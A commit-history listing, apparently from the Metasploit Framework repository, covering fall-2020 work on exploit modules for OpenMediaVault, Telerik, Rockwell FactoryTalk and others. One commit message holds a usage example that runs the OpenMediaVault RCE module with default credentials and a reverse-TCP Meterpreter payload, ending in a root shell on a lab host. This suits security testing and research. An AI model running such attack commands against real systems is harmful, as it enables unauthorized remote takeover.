Commit Graph

18316 Commits

Author SHA1 Message Date
stasinopoulos c165b6b392 Fix regarding redundant else after return. 2020-10-09 08:27:43 +03:00
Grant Willcox 443f26410e Fix up disclosure date 2020-10-08 15:30:56 -05:00
stasinopoulos 6c60a4a39c Update regarding using to_json 2020-10-08 20:51:33 +03:00
Anastasios Stasinopoulos f85ec97233 Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-08 19:56:00 +03:00
Anastasios Stasinopoulos c3d37bde0d Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-08 19:55:22 +03:00
Anastasios Stasinopoulos 23685cdd66 Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-08 19:54:37 +03:00
Spencer McIntyre 3431d97c64 Remove modules whose deprecation date has past 2020-10-08 10:56:37 -04:00
stasinopoulos 9577282ac8 Altered default PAYLOAD in Target "1" (i.e. "Unix In-Memory") 2020-10-08 09:40:26 +03:00
Spencer McIntyre 99bd146428 Fix version-related logic for the Telerik RAU module 2020-10-07 15:03:11 -04:00
Spencer McIntyre fb569a24ee Add module documentation for Telerik RAU Deserialization 2020-10-07 13:40:10 -04:00
Grant Willcox a2675c13e8 Land #14213, Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates 2020-10-07 12:09:59 -05:00
Grant Willcox 2c391e9edc Fix up last of the module that had incorrect disclosure dates 2020-10-07 12:09:35 -05:00
Spencer McIntyre 2edf0390f7 Apply rubocop fixes 2020-10-07 11:11:25 -04:00
Spencer McIntyre adfc8f89c4 Implement version enumeration and report CVE-2017-11317 for Telerik 2020-10-07 10:27:50 -04:00
stasinopoulos 7badf4eb8d Minor updates 2020-10-07 12:25:32 +03:00
stasinopoulos 23990da22d Fix regarding incorrect disclosure date format 2020-10-07 11:02:20 +03:00
stasinopoulos 44e3d11068 Rubocop check 2020-10-07 10:44:24 +03:00
stasinopoulos ca3a4cacb5 OpenMediaVault 5.5.11 Authenticated Remote Code Execution
This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the "sortfield" POST parameter of "rpc.php" page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as root.

### Usage Example
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```
2020-10-07 09:59:45 +03:00
Spencer McIntyre efc8485c86 Fill out module metadata and improve the check method 2020-10-06 18:00:13 -04:00
Pedro Ribeiro 74387f0859 Update rockwell_factorytalk_rce.rb 2020-10-06 12:29:40 +07:00
Pedro Ribeiro 5a6301cfea Add blog link 2020-10-06 12:26:28 +07:00
Spencer McIntyre 4e2093d860 Initial Telerik UI RAU module 2020-10-05 16:42:05 -04:00
Pedro Ribeiro 4657cb6c4a remove EOL spaces 2020-10-06 00:33:28 +07:00
bwatters 3a6293357e Land #14190, Add the DOMAIN option to the CVE-2020-0688 Exploit
Merge branch 'land-14190' into upstream-master
2020-10-05 12:12:21 -05:00
Pedro Ribeiro c405495391 remove begin and add checkcode unknown 2020-10-05 23:44:10 +07:00
Pedro Ribeiro 850c58e902 Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-05 23:36:59 +07:00
Pedro Ribeiro bbe80cadd3 Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-05 23:36:37 +07:00
Pedro Ribeiro 7d17ae6a61 Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-05 23:35:27 +07:00
JRodriguez556 a1164dbe9e Update php_fpm_rce.rb
URI.encode/URI.escape is obsolete. Replaced with CGI.escape.
2020-10-05 11:57:17 -04:00
h00die 15bb690308 fix vulnerability spelling 2020-10-04 13:00:48 -04:00
Alan Foster 30809787c4 Convert disclosure dates to iso8601 2020-10-02 21:00:37 +01:00
Alan Foster 26ff912291 Fix invalid disclosure date formats 2020-10-02 12:20:05 +01:00
youkergav 809584da68 Fixed bug that was crashing orignal session 2020-10-02 04:00:40 -04:00
bwatters e24a81919a Land #13996, Add module for CVE-2020-9801, CVE-2020-9850 and CVE-2020-9856,
RCE for Safari on macOS 10.15.3 (pwn2own2020)

Merge branch 'land-13996' into upstream-master
2020-10-01 09:46:39 -05:00
Pedro Ribeiro 2353b3fdaf Add rockwell sploit 2020-10-01 11:03:50 +07:00
James Lee 80b94334f2 ghetto force java 2020-09-30 16:58:12 -05:00
bwatters 3aeeede4a6 Land #14187, Added CVE-2020-3433 module
Merge branch 'land-14187' into upstream-master
2020-09-29 13:41:33 -05:00
bwatters 81fd2ea8a8 rubocop changes 2020-09-29 13:38:31 -05:00
youkergav 0bceead907 Merge branch 'master' of github.com:rapid7/metasploit-framework into su_login 2020-09-29 01:53:50 -04:00
youkergav 9cf07e499f Replaced payload encoding function 2020-09-29 01:49:40 -04:00
Spencer McIntyre e7d2b73600 Add a DOMAIN option to CVE-2020-0688 for consistency with other modules 2020-09-28 09:24:39 -04:00
youkergav 38fb644169 Architecture updates; base64 password; compliance 2020-09-25 23:58:48 -04:00
Shelby Pace f0f4da2b1e Land #14157, Windows update orchestrator privesc 2020-09-25 16:07:27 -05:00
Antoine GOICHOT fef88f27eb Added CVE-2020-3433 module 2020-09-25 23:04:58 +02:00
Christophe De La Fuente 7bfc47f08a Land #14175, MaraCMS 7.5 Arbitrary File Upload (CVE-2020-25042) 2020-09-25 20:24:55 +02:00
bwatters 2ed72007e0 Typos and cleanup 2020-09-25 12:27:55 -05:00
kalba-security 33b3d6efcc Use register_for_cleanup instead of on_new_session for cleanup 2020-09-25 08:11:02 -04:00
youkergav d45dfe865a Check noexec mount for payload; Coding comliance 2020-09-25 04:01:39 -04:00
youkergav 17483f838e Bug fixes per requests 2020-09-25 00:01:52 -04:00
kalba-security 5b48bae4b0 Use keep_cookies instead of @cookie variable 2020-09-24 16:36:01 -04:00